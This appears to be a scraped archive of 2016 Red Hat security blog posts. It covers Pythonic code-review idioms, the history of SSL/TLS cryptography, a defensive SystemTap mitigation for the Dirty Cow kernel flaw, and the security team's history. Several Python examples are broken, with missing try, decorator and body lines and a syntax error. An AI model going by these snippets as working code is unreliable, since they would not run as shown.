    If the author's priority is to keep related functions together, pushing them to a class is an option to consider. Such classes may never need instantiation, though.

    Free-standing functions are easy to grasp, concise and light. When a function does not cause side-effects, it's also good for functional programming.

    Pythonic loops

    Folks coming from C might feel at home with index-based while loops:

        # Non-Pythonic
        choices = ['red', 'green', 'blue']
        i = 0
        while i < len(choices):
            print('{}) {}'.format(i, choices[i]))
            i += 1

    or with for loops like this:

        # Non-Pythonic
        choices = ['red', 'green', 'blue']
        for i in range(len(choices)):
            print('{}) {}'.format(i, choices[i]))

    When the index is not required, a more Pythonic way would be to run a for loop over a collection:

        # Pythonic!
        choices = ['red', 'green', 'blue']
        for choice in choices:

    Otherwise enumerate the collection and run a for loop over the enumeration:

        # Pythonic!
        choices = ['red', 'green', 'blue']
        for idx, choice in enumerate(choices):
            print('{}) {}'.format(idx, choice))

    As a side note, Python's for loop is quite different from what we have in C, Java or JavaScript. Technically, it's a foreach loop.

    What if we have many collections to loop over? As naive as it could get:

        # Non-Pythonic
        preferences = ['first', 'second', 'third']
        choices = ['red', 'green', 'blue']
        for i in range(len(choices)):
            print('{}) {}'.format(preferences[i], choices[i]))

    But there is a better way -- use zip:

        # Pythonic!
        preferences = ['first', 'second', 'third']
        choices = ['red', 'green', 'blue']
        for preference, choice in zip(preferences, choices):
            print('{}) {}'.format(preference, choice))

    Comprehensions, no tiny loops

    Even a perfectly Pythonic loop can be further improved by turning it into a list or dictionary comprehension. Consider quite a mundane for-loop building a sub-list on a condition:

        # Non-Pythonic
        oyster_months = []
        for month in months:
            if 'r' in month:

    List comprehension reduces the whole loop into a one-liner!

        # Pythonic!
        oyster_months = [month for month in months if 'r' in month]

    Dictionary comprehension works similarly, but for mapping types.

    Readable signatures

    Differing from many languages, in Python, names of function parameters are always part of function signature:

        >>> def count_fruits(apples, oranges):
        ...     return apples + oranges
        >>> count_fruits(apples=12, oranges=21)
        >>> count_fruits(garlic=14, carrots=12)
        TypeError: count_fruits() got an unexpected keyword argument 'garlic'

    The outcome is twofold: a caller can explicitly refer to a parameter name to improve code readability. The function's author should be aware of callers possibly binding to a once-announced name and restrain from changing names in public APIs.

    At any rate, passing named parameters to the functions we call adds to code readability.

    Named tuples for readability

    Wrapping structured stuff into a tuple is a recipe for communicating multiple items with a function. Trouble is that it quickly becomes messy:

        # Non-Pythonic
        >>> team = ('Jan', 'Viliam', 'Ilya')
        >>> team
        ('Jan', 'Viliam', 'Ilya')
        >>> lead = team[0]

    Named tuples simply add names to tuple elements so that we can enjoy object notation for getting hold of them:

        # Pythonic!
        >>> Team = collections.namedtuple('Team', ['lead', 'eng_1', 'eng_2'])
        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> team
        Team(lead='Jan', eng_1='Viliam', eng_2='Ilya')
        >>> lead = team.lead

    Using named tuples improves readability at the cost of creating an extra class. Keep in mind, though, that namedtuple factory functions create a new class by exec'ing a template -- that may slow things down in a tight loop.

    Exceptions, no checks

    Raising an exception is a primary vehicle for communicating errors in a Python program. It's easier to ask for forgiveness than permission, right?

        # Non-Pythonic
        if resource_exists():
        # Pythonic!
        except ResourceDoesNotExist:

    Beware likely failing exceptions in tight loops, though -- those may slow down your code.

    It is generally advisable to subclass built-in exception classes. That helps to clearly communicate errors that are specific to our problem and differentiate errors that bubble up to our code from other, less expected failures.

    Ad-hoc namespaces

    When we encounter colliding variables, we might want to isolate them from each other. The most obvious way is to wrap at least one of them into a class:

        # Non-Pythonic
        class NS:
        ns = NS()
        ns.fruits = ['apple', 'orange']

    But there is a handy Pythonic shortcut:

        # Pythonic!
        ns = types.SimpleNamespace(fruits=['apple', 'orange'])

    The SimpleNamespace object acts like any class instance -- we can add, change or remove attributes at any moment.

    Dictionary goodies

    Python dict is a well-understood canonical data type much like a Perl hash or a Java HashMap. In Python, however, we have a few more built-in features like returning a value for a missing key:

        >>> dict().get('missing key', 'failover value')
        'failover value'

    Conditionally setting a key if it's not present:

        >>> dict().setdefault('key', 'new value')
        'new value'
        >>> d = {'key': 'old value'}
        >>> d.setdefault('key', 'new value')
        'old value'

    Or automatically generate an initial value for missing keys:

        >>> d = collections.defaultdict(int)
        >>> d['missing key'] += 1
        >>> d['missing key']

    A dictionary that maintains key insertion order:

        >>> d = collections.OrderedDict()
        >>> d['x'] = 1
        >>> d['y'] = 1
        >>> list(d)
        ['x', 'y']
        >>> del d['x']
        >>> d['x'] = 1
        >>> list(d)
        ['y', 'x']

    Newcomers may not be aware of these nifty little tools -- let's tell them!

    Go for iterables

    When it comes to collections, especially large or expensive ones to compute, the concept of iterability kicks right in. To start with, a for loop implicitly operates over Iterable objects:

        for x in [1, 2, 3]:
        for line in open('myfile.txt', 'r'):

    Many built-in types are already iterable. User objects can become iterable by supporting the iterator protocol:

        class Team:
            def __init__(self, *members):
                self.members = members
                self.index = 0
            def __iter__(self):
                return self
            def __next__(self):
                    return self.members[self.index]
                except IndexError:
                    raise StopIteration
                    self.index += 1

    so they can be iterated over a loop:

        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> for member in team:
        ...     print(member)

    as well as in many other contexts where an iterable is expected:

        >>> team = Team('Jan', 'Viliam', 'Ilya')
        >>> reversed(team)
        ['Ilya', 'Viliam', 'Jan']

    Iterable user functions are known as generators:

        def team(*members):
            for member in members:
                yield member
        >>> for member in team('Jan', 'Viliam', 'Ilya'):
        ...     print(member)

    The concept of an iterable type is firmly built into the Python infrastructure and it is considered Pythonic to leverage iterability features.

    Besides being handled by built-in operators, there is a collection of functions in the itertools module that are designed to consume and/or produce iterables.

    Properties for gradual encapsulation

    Java and C++ are particularly famous for promoting object state protection by operating via "accessor" methods (also known as getters/setters). A Pythonic alternative to them is based on the property feature. Unlike Java programmers, Pythonistas do not begin with planting getters and setters into their code. They start out with simple, unprotected attributes:

        class Team:
            members = ['Jan', 'Viliam', 'Ilya']
        team = Team()

    Once a need for protection arises, we turn an attribute into a property by adding access controls into the setter:

        class Team:
            _members = ['Jan', 'Viliam', 'Ilya']
            def members(self):
                return list(self._members)
            def members(self, value):
                raise AttributeError('This team is too precious to touch!')
        >>> team = Team()
        >>> print(team.members)
        ['Jan', 'Viliam', 'Ilya']
        >>> team.members = []
        AttributeError('This team is too precious to touch!',)

    Python properties are implemented on top of descriptors which is a lower-level but more universal mechanism to get hold on attribute access.

    Context managers to guard resources

    It is common for programs to acquire resources, use them, and clean up afterwards. A simplistic implementation might look like this:

        # Non-Pythonic
        resource = allocate()

    In Python, we could re-factor this into something more succinct, leveraging the context manager protocol:

        # Pythonic!
        with allocate_resource() as resource:

    The expression following a with must support the context manager protocol. Its __enter__ and __exit__ magic methods will be called respectively before and after the statements inside the with block.

    Context managers are idiomatic in Python for all sorts of resource control situations: working with files, connections, locks, processes. To give a few examples, this code will ensure that a connection to a web server is closed once the execution runs out of with block:

        with contextlib.closing(urllib.urlopen('https://redhat.com')) as conn:

    The suppress context manager silently ignores the specified exception if it occurs within the body of the with statement:

        with contextlib.suppress(IOError):

    Decorators to add functionality

    Python decorators work by wrapping a function with another function. Use cases include memoization, locking, pre/post-processing, access control, timing, and many more.

    Consider a straightforward memoization implementation:

        # Non-Pythonic
        cache = {}
        def compute(arg):
            if arg not in cache:
                cache[arg] = do_heavy_computation(arg)
            return cache[arg]

    This is where Python decorators come in handy:

        def universal_memoization_decorator(computing_func):
            cache = {}
            def wrapped(arg):
                if arg not in cache:
                    cache[arg] = computing_func(arg)
                return cache[arg]
            return wrapped
        # Pythonic!
        def compute(arg)
            return do_heavy_computation(arg)

    The power of decorators comes from their ability to modify function behavior in a non-invasive and universal way. That opens up possibilities to offload business logic into a specialized decorator and reuse it across the whole codebase.

    The Python standard library offers many ready-made decorators. For example, the above memorization tool is readily available in the standard library:

        # Pythonic!
        def compute(arg):
            return do_heavy_computation(arg)

    Decorators have made their way into public APIs in large projects like Django or PyTest.

    Duck typing

    Duck typing is highly encouraged in Python for being more productive and flexible. A frequent use-case involves emulating built-in Python types such as containers:

        # Pythonic!
        class DictLikeType:
            def __init__(self, *args, **kwargs):
                self.store = dict(*args, **kwargs)
            def __getitem__(self, key):
                return self.store[key]

    Full container protocol emulation requires many magic methods to be present and properly implemented. This can become laborious and error prone. A better way is to base user containers on top of a respective abstract base class:

        # Extra Pythonic!
        class DictLikeType(collections.abc.MutableMapping):
            def __init__(self, *args, **kwargs):
                self.store = dict(*args, **kwargs)
            def __getitem__(self, key):
                return self.store[key]

    Not only would we have to implement less magic methods, the ABC harness ensures that all mandatory protocol methods are in place. This partly mitigates the inherent fragility of dynamic typing.

    Goose typing

    Type checking based on types hierarchy is a popular pattern in Python programs. People with a background in statically-typed languages tend to introduce ad-hoc type checks like this:

        # Non-Pythonic
        if not isinstance(x, list):
            raise ApplicationError('Python list type is expected')

    While not discouraged in Python, type checks could be made more general and reliable by testing against abstract base types:

        # Pythonic!
        if not isinstance(x, collections.abc.MutableSequence):
            raise ApplicationError('A sequence type is expected')

    This is known as "Goose typing" in Python parlance. It immediately makes a type check compatible with both built-in and user types that inherit from abstract base classes. Additionally, checking against an ABC empowers interface-based, as opposed to hierarchy-based, types comparison :

        class X:
            def __len__(self):
                return 0
        >>> x = X()
        >>> isinstance(x, collections.abc.Sized)

    Alternative to ad-hoc type checks planted into the code is the gradual typing technique which is fully supported since Python 3.6. It is based on the idea of annotating important variables with type information, then running a static analyzer over the annotated code like this:

        def filter_by_key(d: typing.Mapping, s: str) -> dict:
            return {k: d[k] for k in d if k == s}
        d: dict = filter_by_key('x': 1, 'y': 2}, 'x')

    Static typing tends to make programs more reliable by leveraging explicit type information, computing types compatibility and failing gracefully when a type error is discovered. When type hinting is adopted by a project, type annotations can fully replace ad-hoc type checks throughout the code.

    Pythonista's power tools

    It may occur to a reviewer, that a more efficient solution is possibly viable here and there. To establish solid technical grounds by backing their re-factoring proposal with hard numbers rather than intuition or personal preference, a quick analysis may come in handy.

    Among the tools I use when researching for a better solution are dis (for bytecode analysis), timeit (for code snippets running time measurement) and profile (for finding hot spots in a running Python program).

    Happy reviewing!

    Posted: 2016-12-14T14:30:00+00:00
  • Evolution of the SSL and TLS protocols

    Authored by: Huzaifa Sidhpurwala

    The Transport Layer Security (TLS) protocol is undoubtedly the most widely used protocol on the Internet today. If you have ever done an online banking transaction, visited a social networking website, or checked your email, you have most likely used TLS. Apart from wrapping the plain text HTTP protocol with cryptographic goodness, other lower level protocols like SMTP and FTP can also use TLS to ensure that all the data between client and server is inaccessible to attackers in between. This article takes a brief look at the evolution of the protocol and discusses why it was necessary to make changes to it.

    Like any other standard used today on the internet, the TLS protocol also has a humble beginning and a rocking history. Originally developed by Netscape in 1993 it was initially called Secure Sockets Layer (SSL). The first version was said to be so insecure that "it could be broken in ten minutes" when Marc Andreessen presented it at an MIT meeting. Several iterations were made which led to SSL version 2 and, later in 1995, SSL version 3. In 1996, an IETF working group formed to standardize SSL. Even though the resulting protocol is almost identical to SSL version 3, the process took three years.

    TLS version 1.0, with a change in name to prevent trademark issues, was published as RFC 2246. Later versions 1.1 and 1.2 were published which aimed to address several shortcomings and flaws in the earlier versions of the protocol.

    Cryptographic primitives are based on mathematical functions and theories

    The TLS protocol itself is based on several cryptographic primitives including asymmetric key exchange protocols, ciphers, and hashing algorithms. Assembling all these primitives together securely is non-trivial and would not be practical to implement individually in the same way TLS does. For example, AES is a pretty strong symmetric cipher, but like any other symmetric cipher it needs the encryption key to be securely exchanged between the client and the server. Without an asymmetric cipher there is no way to exchange keys on an insecure network such as the Internet. Hashing functions are used to help authenticate the certificates used to exchange the keys and also ensure integrity of data-in-transit. These hash algorithms, like SHA, have one way properties and are reasonably collision resistant. All these cryptographic primitives, arranged in a certain way, make up the TLS protocol as a whole.

    Key Exchanges

    The reason two systems that have never met can communicate securely is due to secure key exchange protocols. Because each system must know the same secret to establish a secure communications path using a symmetric cipher, the use of key exchange systems allow those two systems to establish that secret and securely share it with each other to establish the communications path.

    The Rivest-Shamir-Adleman (RSA) cryptosystem is the most widely used asymmetric key exchange algorithm. This algorithm assumes that factorization of large numbers is difficult, so while the public key (n) is calculated using n = p x q, it is hard for an attacker to factorize n into the corresponding primes p and q, which can be easily used to calculate the private key.

    The Diffie-Hellman key exchange (DHE) uses the discrete log problem and assumes that when given y = g ^ a mod p, it is difficult to solve this equation to extract the private key a. Elliptic-Curve-based Diffie-Hellman key exchange (ECDHE) uses the abstract DH problem, but uses multiplication in elliptic curve groups for its security.

    Symmetric algorithms

    Symmetric algorithms used today like Advanced Encryption Standard (AES) have good confusion and diffusion properties, which mean that the encrypted data will be statistically different from the input. ChaCha20 is a newer stream cipher that is starting to see some traction and may see additional use in the future as a faster alternative to AES.

    Changes as time and technology progresses

    Faster computers are now more accessible to the common public via cloud computing, GPUs, and dedicated FPGA devices than they were 10 years ago. New computation methods have also become possible. Quantum computers are getting bigger, making possible attacks on the underlying mathematics of many algorithms used for cryptography. Also, new research in mathematics means that as older theories are challenged and newer methods are invented and researched, our previous assumptions about hard mathematical problems are losing ground.

    New design flaws in the TLS protocol are also discovered from time to time. The POODLE flaw in SSL version 3 and DROWN flaw in SSL version 2 showed that the previous versions of the protocol are not secure. We can likely expect currently deployed versions of TLS to also have weaknesses as research continues and computing power gets greater.

    Attacks against cryptographic primitives and its future


    The best known attack against RSA is still factoring n into its components p and q. The best known algorithm for factoring integers larger than 10^100 is the number field sieve. The current recommendation from NIST is using a minimum RSA key length of 2048 bits for information needed to be protected until at least the year 2030. For secrecy beyond that year larger keys will be necessary.

    RSA's future, however, is bleak! IETF recommended removal of static-RSA from the TLS version 1.3 draft standard stating "[t]hese cipher suites have several drawbacks including lack of PFS, pre-master secret contributed only by the client, and the general weakening of RSA over time. It would make the security analysis simpler to remove this option from TLS version 1.3. RSA certificates would still be allowed, but the key establishment would be via DHE or ECDHE." The consensus in the room at IETF-89 was to remove RSA key transport from TLS 1.3.

    DHE and ECC

    Like RSA, the best known attack against DHE is the number field sieve. With the current computing power available, a 512-bit DH key takes 10 core-years to break. NIST recommends a key size of 224 bits and 2048-bit group size for any information which needs to be protected till 2030.

    As compared to DHE, ECC has still stood its ground and is being increasingly used in newer software and hardware implementations. Most of the known attacks against ECC work only on special hardware or against buggy implementations. NIST recommends use of at least 224-bit key size for ECC curves.

    However, the biggest threat to all of the above key exchange methods is quantum computing. Once viable quantum computing technology is available, all of the above public key cryptography systems will be broken. NIST recently conducted a workshop on post-quantum cryptography and several alternatives to the above public cryptography schemes were discussed. It is going to be interesting to watch what these discussions lead to, and what new standards are formed.

    Symmetric ciphers and hashes

    All symmetric block ciphers are vulnerable to brute force attacks. The amount of time taken to brute force depends on the size of the key; the bigger the key, the more time and power it takes to brute force. The SWEET32 attack has already shown that small block sizes are bad and has finally laid 3DES to rest. We already know that RC4 is insecure and there have been several attempts to deprecate it.

    The proposed TLS version 1.3 draft has provision for only two symmetric ciphers, namely AES and ChaCha20, and introduces authenticated encryption (AEAD). The only MAC function allowed is Poly1305.

    And in conclusion...

    No one knows for sure what will happen next but history has shown that older algorithms are at risk. That's why it is so important to stay up to date on cryptography technology. Developers should make sure their software supports the latest versions of TLS while deprecating older versions that are broken (or weakened). System owners should regularly test their systems to verify what ciphers and protocols are supported and stay educated on what is current and what the risks are to utilizing old cryptography.

    Posted: 2016-11-16T14:30:00+00:00
  • Understanding and mitigating the Dirty Cow Vulnerability

    Authored by: Anonymous

    Rodrigo Freire & David Sirrine - Red Hat Technical Account Management Team

    Dirty Cow (CVE-2016-5195) is the latest branded vulnerability, with a name, a logo, and a website, to impact Red Hat Enterprise Linux. This flaw is a widespread vulnerability and spans Red Hat Enterprise Linux versions 5, 6, and 7. Technical details about the vulnerability and how to address it can be found at: Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195.

    In order to be successful, an attacker must already have access to a server before they can exploit the vulnerability. Dirty Cow works by creating a race condition in the way the Linux kernel's memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. This race condition can allow an unprivileged local user to gain write access to read-only memory mappings and, in turn, increase their privileges on the system.

    Copy-on-write is a technique that allows a system to efficiently duplicate or copy a resource which is subject to modification. If a resource is copied but not modified, there's no need to create a new resource; the resource can be shared between the copy and the original. In case of a modification, a new resource is created.

    While there is currently an updated kernel available that addresses this issue, in large data centers where affected systems can number in the hundreds, thousands, or even tens of thousands, it may not be possible to find a suitable maintenance window to update all the affected systems as this requires downtime to reboot the system. RHEL7.2 systems or above can be live-patched to fix this issue using kpatch. In order to take advantage of this Red Hat benefit, file a support case, inform about the kernel version, and request a suitable kpatch. For more details about what a kpatch is see: Is live kernel patching (kpatch) supported in RHEL 7?

    RHEL 5 and 6, while affected, do not support kpatch. Fortunately, there is a stopgap solution for this vulnerability using SystemTap. The SystemTap script will apply the patch while the system is running, without the need of a reboot. This is done by intercepting the vulnerable system call, which allows the system to continue working as expected without being compromised.

    A word of caution: this SystemTap solution can potentially impair a virus scanner running in the system. Please check with your antivirus vendor.

    The SystemTap script is relatively small and efficient, broken into 4 distinct sections as follows:

    probe kernel.function("mem_write").call ? {
            $count = 0
    probe syscall.ptrace {  // includes compat ptrace as well
            $request = 0xfff
    probe begin {
            printk(0, "CVE-2016-5195 mitigation loaded")
    probe end {
            printk(0, "CVE-2016-5195 mitigation unloaded")

    First, the script places a probe at the beginning of the kernel function “mem_write” when called and not loaded inline:

    probe kernel.function("mem_write").call ? {
            $count = 0

    Next, the script places a probe at the ptrace syscalls that disables them (this bit can impair antivirus software and potentially other kinds of software such as debuggers):

    probe syscall.ptrace {  // includes compat ptrace as well
            $request = 0xfff

    Finally, the “probe begin” and “probe end” code blocks tell systemtap to add the supplied text to the kernel log buffer via the printk function. This creates an audit trail by registering in the system logs exactly when the mitigation is loaded and unloaded.

    This solution works in all affected RHEL versions: 5, 6, and 7.

    Red Hat always seeks to provide both mitigations to disable attacks as well as the actual patches to treat the flaw. To learn more about SystemTap, and how it can be used in your management of your Red Hat systems, please refer to Using SystemTap or one of our videos about it within our Customer Portal.

    Again, for more information on how to use the SystemTap solution or to see links to the available patches, please visit the "Resolve" tab in the related Red Hat Vulnerability Response article.

    Posted: 2016-11-09T14:30:00+00:00
  • From There to Here (But Not Back Again)

    Authored by: Vincent Danen

    Red Hat Product Security recently celebrated our 15th anniversary this summer and while I cannot claim to have been with Red Hat for that long (although I’m coming up on 8 years myself), I’ve watched the changes from the “0day” of the Red Hat Security Response Team to today. In fact, our SRT was the basis for the security team that Mandrakesoft started back in the day.

    In 1999, I started working for Mandrakesoft, primarily as a packager/maintainer. The offer came, I suspect, because of the amount of time I spent volunteering to maintain packages in the distribution. I also was writing articles for TechRepublic at the time, so I also ended up being responsible for some areas of documentation, contributing to the manual we shipped with every boxed set we sold (remember when you bought these things off the shelf?).

    Way back then, when security flaws were few and far between (well, the discovery of these flaws, not the existence of them, as we’ve found much to our chagrin over the years), there was one individual at Mandrakesoft who would apply fixes and release them. The advisory process was ad-hoc at best, and as we started to get more volume it was taking his time away from kernel hacking and so they turned to me to help. Having no idea that this was a pivotal turning point and would set the tone and direction of the next 16 years of my life, I accepted. The first security advisory I released for Linux-Mandrake was an update to BitchX in July of 2000. So in effect, while Red Hat Product Security celebrated 15 years of existence this summer, I celebrated my 16th anniversary of “product security” in open source.

    When I look back over those 16 years, things have changed tremendously. When I started the security “team” at Mandrakesoft (which, for the majority of the 8 years I spent there, was a one-man operation!) I really had no idea what the future would hold. It blows my mind how far we as an industry have come and how far I as an individual have come as well. Today it amazes me how I handled all of the security updates for all of our supported products (multiple versions of Mandriva Linux, the Single Network Firewall, Multi-Network Firewall, the Corporate Server, and so on). While there was infrastructure to build the distributions, there was none for building or testing security updates. As a result, I had a multi-machine setup (pre-VM days!) with a number of chroots for building and others for testing. I had to do all of the discovery, the patching, backporting, building, testing, and the release. In fact, I wrote the tooling to push advisories, send mail announcements, build packages across multiple chroots, and more. The entire security update “stack” was written by me and ran in my basement.

    During this whole time I looked to Red Hat for leadership and guidance. As you might imagine, we had to play a little bit of catchup many times and when it came to patches and information, it was Red Hat that we looked at primarily (I’m not at all ashamed to state that quite often we would pull patches from a Red Hat update to tweak and apply to our own packages!). In fact, I remember the first time I talked with Mark Cox back in 2004 when we, along with representatives of SUSE and Debian, responded to the claims that Linux was less secure than Windows. While we had often worked well together through cross-vendor lists like vendor-sec and coordinated on embargoed issues and so on, this was the first real public stand by open source security teams against some mud that was being hurled against not just our products, but open source security as a whole. This was one of those defining moments that made me scary-proud to be involved in the open source ecosystem. We set aside competition to stand united against something that deeply impacted us all.

    In 2009 I left Mandriva to work for Red Hat as part of the Security Response Team (what we were called back then). Moving from a struggling small company to a much larger company was a very interesting change for me. Probably the biggest change and surprise was that Red Hat had the developers do the actual patching and building of packages they normally maintained and were experienced with. We had a dedicated QA team to test this stuff! We had a rigorous errata process that automated as much as possible and enforced certain expectations and conditions of both errata and associated packages. I was actually able to focus on the security side of things and not the “release chain” and all parts associated with it, plus there was a team of people to work with when investigating security issues.

    Back at Mandriva, the only standard we focused on was the usage of CVE. Coming to Red Hat introduced me to the many standards that we not only used and promoted, but also helped shape. You can see this in CVE, and now DWF, OpenSCAP and OVAL, CVRF, the list goes on. Not only are we working to make, and keep, our products secure for our customers, but we apply our expertise to projects and standards that benefit others as these standards help to shape other product security or incident response teams, whether they work on open source or not.

    Finally (as an aside and a “fun fact”) when I first started working at Mandrakesoft with open source and Linux, I got a tattoo of Tux on my calf. A decade later, I got a tattoo of Shadowman on the other calf. I’m really lucky to work on things with cool logos, however I’ve so far resisted getting a tattoo of the heartbleed logo!

    I sit and think about that initial question that I was asked 16 years ago: “Would you want to handle the security updates?”. I had no idea it would send me to work with the people, places, and companies that I have. No question that there were challenges and more than a few times I’m sure that the internet was literally on fire but it has been rewarding and satisfying. And I consider myself fortunate that I get to work every day with some of the smartest, most creative, and passionate people in open source!

    Posted: 2016-10-24T13:30:00+00:00
  • Happy 15th Birthday Red Hat Product Security

    Authored by: Mark J. Cox

    This summer marked 15 years since we founded a dedicated Product Security team for Red Hat. While we often publish information in this blog about security technologies and vulnerabilities, we rarely give an introspection into the team itself. So I’d like, if I may, to take you on a little journey through those 15 years and call out some events that mean the most to me; particularly what’s changed and what’s stayed the same. In the coming weeks some other past and present members of the team will be giving their anecdotes and opinions too. If you have a memory of working with our team we’d love to hear about it, you can add a comment here or tweet me.

    Our story starts, however, before I joined the company. Red Hat was producing Red Hat Linux in the 1990’s and shipping security updates to it. Here’s an early security update notice from 1998, and the first formal Red Hat Security Advisory (RHSA) RHSA-1999:013. Red Hat would collaborate on security issues along with other Linux distributors on a private communication list called “vendor-sec”, then an engineer would build and test updates prior to them being signed and made available.

    In Summer 2000, Red Hat acquired C2Net, a security product company I was working at. C2Net was known for the most widely used secure web server at the time, Stronghold. Red Hat was a small company and so with my security background (being also a founder of the Apache Software Foundation and OpenSSL) it was common for all questions on anything security related to end up at my desk. Although our engineers were responsive to dealing with security patches in Red Hat Linux, we didn’t have any published processes in handling issues or dealing with researchers and reporters, and we knew it needed something more scalable for the future and when we had more than one product. So with that in mind I formed the Red Hat Security Response Team (SRT) in September 2001.

    The mission for the team was a simple one: to be “responsible for ensuring that security issues found in Red Hat products and services are addressed”. The charter went into a little more detail:

    • Be a contact point for our customers who have found security issues in our products or services, and publish our procedures for dealing with this contact;
    • Track alerts and security issues within the community which may affect users of Red Hat products and services;
    • Investigate and address security issues in our supported products and services;
    • Ensure timely security fixes for our products;
    • Ensure that customers can easily find, obtain, and understand security advisories and updates;
    • Help customers keep their systems up to date, and minimize the risk of security issues;
    • Work with other vendors of Linux and open source software (including our competitors) to reduce the risk of security issues through information sharing and peer review.

    That mission and the detailed charter were published on our web site along with many of our policies and procedures. Over the years this has changed very little, and our mission today maps closely to that original one. From day one we wanted to be responsive to anyone who mailed the security team so we set a high internal SLA goal to have a human response to incoming security email within one business day. We miss that high standard from time to time, but we average over 95% achievement.

    Fundamentally, all software has bugs; some bugs have a security consequence. If you’re a product vendor you need a security response team to handle tracking and fixing those security flaws. Given Red Hat products are comprised of open source software, this presents some unique challenges in how to deal with security issues in a supply chain comprising of thousands of different projects, each with their own development teams, policies, and methodologies. From those early days Red Hat worked out how to do this and do it well. We leveraged the “Getting Things Done” (GTD) methodology to create internal workflows and processes that worked in a stressful environment: where every day could bring something new, and work was mostly comprised of interruptions, you need to have a system you can trust so tasks can be postponed and reprioritised without getting lost.

    "Red Hat has had the best track record in dealing with third-party vulnerabilities. This may be due to the extent of their involvement with third-party vendors and the open-source community, as they often contribute their own patches and work closely with third-party vendors." -- Symantec Internet Security Threat Report 2007

    By 2002 we had started using Common Vulnerabilities and Exposures (CVE) names to identify vulnerabilities, not just during the publication of our advisories, but for helping with the co-ordination of issues in advance between vendors, an unexpected use that was a pleasant surprise to the creators at MITRE. As a CVE editorial board member I would be personally asked to vote on every vulnerability (vulnerabilities would start out as candidates, with a CAN- prefix, before migrating to full CVE- names). As you can imagine that process didn’t last long as the popularity of using CVE names across the industry meant the number of vulnerabilities being handled started to rapidly increase. Now it is uncommon to hear about any vulnerability that doesn’t have a CVE name associated with it. Scaling the CVE process became a big issue in the last few years and hit a crisis point; however in 2016 the DWF project forced changes which should help address these concerns long term, forcing a distributed process instead of one with a bottleneck.

    In the early 2000’s, worms that attacked Linux were fairly common, affecting services that were usually enabled and Internet facing by default such as “sendmail” and “samba”. None of the worms were “0 day” however, they instead exploited vulnerabilities which had had updates to address them released weeks or months prior. September 2002 saw the “Slapper worm” which affected OpenSSL via the Apache web server, “Millen” followed in November 2002 exploiting IMAP. By 2005, Red Hat Enterprise Linux shipped with randomization, NX, and various heap and other protection mechanisms which, together with more secure application defaults (and SELinux enabled by default), helped to disrupt worms. By 2014 logos and branded flaws took over our attentions, and exploits became aimed at making money through botnets and ransomware, or designed for leaking secrets.

    As worms and exploits with clever names were common then, vulnerabilities with clever names, domain names, logos, and other branding are common now. This trend really started in 2014 with the OpenSSL flaw “Heartbleed”. Heartbleed was a serious issue that helped highlight the lack of attention in some key infrastructure projects. But not all the named security issues that followed were important. As we’ve shown in the past just because a vulnerability gets a fancy name doesn’t mean it’s a significant issue (also true in reverse). These issues highlighted the real importance of having a dedicated product security team – a group to weed through the hype and figure out the real impact to the products you supply to your customers. It really has to be a trusted partnership with the customer though, as you have to prove that you’re actually doing work analysing vulnerabilities with security experts, and not simply relying on a press story or third-party vulnerability score. Our Risk Report for 2015 took a look at the branded issues and which ones mattered (and why) and at the Red Hat Summit for the last two years we’ve played a “Game of Flaws” card game, matching logos to vulnerabilities and talking about how to assess risk and figure out the importance of issues.

    Just like Red Hat itself, SRT was known for it’s openness and transparency. By 2005 we were publishing security data on every vulnerability we addressed along with the metrics on when the issue was public, how long it was embargoed, the issue CWE type, CVSS scoring, and more. We provided XML feeds of vulnerabilities, scripts that could run risk reports, along with detailed blogs on our performance and metrics. In 2006 we started publishing Open Vulnerability Assessment Language (OVAL) definitions for Red Hat Enterprise Linux products, allowing industry standard tools to be able to test systems for outstanding errata. These OVAL definitions are consumed today by tools such as OpenSCAP. Our policy of backporting security fixes caused problems for third-party scanning tools in the early days, but now by using our data such as our OVAL definitions they can still give accurate results to our mutual customers. As new security standards emerged, like Common Vulnerability Reporting Framework (CVRF) in 2011, we’d get involved in the definitions and embrace them. In this case helping define the fields and providing initial example content to help promote the standard. While originally we provided this data in downloadable files on our site, we now have an open API allowing easier access to all our vulnerability data.

    "Red Hat's transparency on its security performance is something that all distributions should strive for -- especially those who would tout their security response" -- Linux Weekly News (July 2008)

    Back in 2005 this transparency on metrics was especially important; as our competitors (of non-open source operating systems) were publishing industry reports comparing vulnerability “days of risk” and doing demonstrations with bags of candies showing how many more vulnerabilities we were fixing than they were. Looking back it’s hard to believe anyone took them seriously. Our open data helped counter these reports and establish that they were not comparing things in a “like-for-like” way; for example treating all issues as having the same severity, or completely not counting issues that were found by the vendor themselves. We even did a joint statement with other Linux distributions, something unprecedented. We still publish frequent “risk reports” which give an honest assessment of how well we handled security issues in our products, as well as helping customers figure out which issues mattered.

    Our team grew substantially over the years, both in numbers of associates and in diversity - with staff spread across time zones, offices, and in ten different countries. Our work also was not just the reactive security work but involved proactive work such as auditing and bug finding too. Red Hat associates in our team also help in upstream communities to help projects assess and deal with security issues and present at technical conferences. We’d also help secure the internal supply chain, such as providing facilities and processes for package signing using hardware cryptographic modules. This led a few years ago to the rebranding as “Red Hat Product Security” to better reflect this multi-faceted nature of the team. Red Hat associates continue to find flaws in Red Hat products as well as in products and services from other companies which we report responsibly. In 2016 for example 12% of issues addressed in our products were discovered by Red Hat associates, and we continue to work with our peers on embargoed security issues.

    In our first year we released 152 advisories to address 147 vulnerabilities. In the last year we released 642 advisories to address 1415 vulnerabilities across more than 100 different products, and 2016 saw us release our 5000th advisory.

    In a subscription-based business you need to continually show value to customers, and we talk about it in terms of providing the highest quality of security service. We are already well known for getting timely updates our for critical issues: for Red Hat Enterprise Linux in 2016, for example, 96% of Critical security issues had an update available the same or next calendar day after the issue was made public. But our differentiator is not just providing timely security updates, it’s a much bigger involvement. Take the issue in bash in 2014 which was branded “Shellshock” as an example. Our team's response was to ensure we provided timely fixes, but also to provide proactive notifications to customers, through our technical account managers and portal notifications, as well as knowledge base and solution articles to help customers quickly understand the issue and their exposure. Our engineers created the final patch used by vendors to address the issue, we provided testing tools, and our technical blog describing the flaw was the definitive source of information which was referenced as authoritative by news articles and even US-CERT.

    My favourite quote comes from Alan Kay in 1971: “The best way to predict the future is to invent it”. I’m reminded every day of the awesome team of world-class security experts we’ve built up at Red Hat and I enthusiastically look forward to helping them define and invent the future of open source product security.

    Posted: 2016-10-17T13:30:00+00:00
  • A bite of Python

    Authored by: Ilya Etingof

